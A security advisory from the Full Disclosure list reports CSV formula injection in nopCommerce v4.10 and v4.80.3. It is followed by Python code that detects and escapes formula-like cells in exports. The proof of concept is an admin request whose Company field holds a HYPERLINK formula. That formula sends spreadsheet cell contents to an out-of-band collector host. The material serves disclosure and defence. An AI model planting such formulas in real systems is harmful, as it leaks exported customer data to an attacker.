CSV Injection in nopcommerce v4.10 and 4.80.3
nopCommerce versions v4.10 and v4.80.3 contain a CSV injection vulnerability that allows an attacker to control the content of exported files through malicious formulas, which are executed when the file is opened. 2025-8-19 03:0:21 Author: seclists.org


Full Disclosure mailing list archives


From: Ron E <ronaldjedgerson () gmail com>
Date: Sun, 17 Aug 2025 22:55:34 -0400

nopCommerce versions v4.10 and v4.80.3 are vulnerable to CSV Injection
(Formula Injection) when exporting data to CSV. The application does not
properly sanitize user-supplied input before including it in CSV export
files.

An attacker can inject malicious spreadsheet formulas into fields that will
later be exported (for example, order details, product names, or customer
information). When the exported file is opened in spreadsheet software such
as Microsoft Excel or LibreOffice Calc, the injected formula is executed.

POST /Admin/Customer/Edit/4 HTTP/2
Host: <host>
Cookie: ***

save=&Id=4&--snip--Company=%3DHYPERLINK%28%22http%3A%2F%2F00yjdi594jbbty6hwkuhfssas1ysmtai.oastify.com%3Fdata%3D%22%26A1%26A2%26B2%26C2%26D2%2C+%22Click+me%22%29
--snip--

HTTP/2 200 OK
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
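One way to neutralise the exported fields the advisory describes, as an added example that is not nopCommerce's code: every cell whose first non-space character is a formula trigger is prefixed with a single quote before the CSV writer quotes it, so the spreadsheet shows the text instead of evaluating it. `neutralize_cell`, `is_formula_like`, `export_customers` and the sample rows are constructed here; the URL in the sample is a placeholder.

```python
import csv
import io

# Characters spreadsheet applications treat as the start of a formula
# (per OWASP CSV injection guidance). Tab and carriage return are included
# because Excel strips them and evaluates what follows.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value):
    """Detection helper: True if a cell would be evaluated as a formula."""
    return str(value).lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_cell(value):
    """Return a CSV-safe string for one exported cell.

    A leading trigger (after any spaces) is prefixed with a single quote;
    the CSV writer handles quoting and doubling of embedded double quotes.
    """
    if value is None:
        return ""
    text = str(value)
    return "'" + text if is_formula_like(text) else text


def export_customers(rows):
    """Serialise customer dicts to CSV text with every cell neutralised.

    Constructed stand-in for an application's export routine.
    """
    header = ["Id", "Email", "Company"]
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=header,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(row.get(k)) for k in header})
    return buf.getvalue()


# Constructed sample: the Company field carries a HYPERLINK formula like the
# one in the advisory, pointing at a placeholder domain.
SAMPLE_ROWS = [
    {"Id": 4, "Email": "user@example.com",
     "Company": '=HYPERLINK("http://example.invalid/?data="&A1&A2, "Click me")'},
    {"Id": 5, "Email": "other@example.com", "Company": "Acme-Widgets Ltd"},
]
```

A hyphen or plus inside a value (such as "Acme-Widgets Ltd") is left untouched; only a leading trigger is escaped.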



Article source: https://seclists.org/fulldisclosure/2025/Aug/15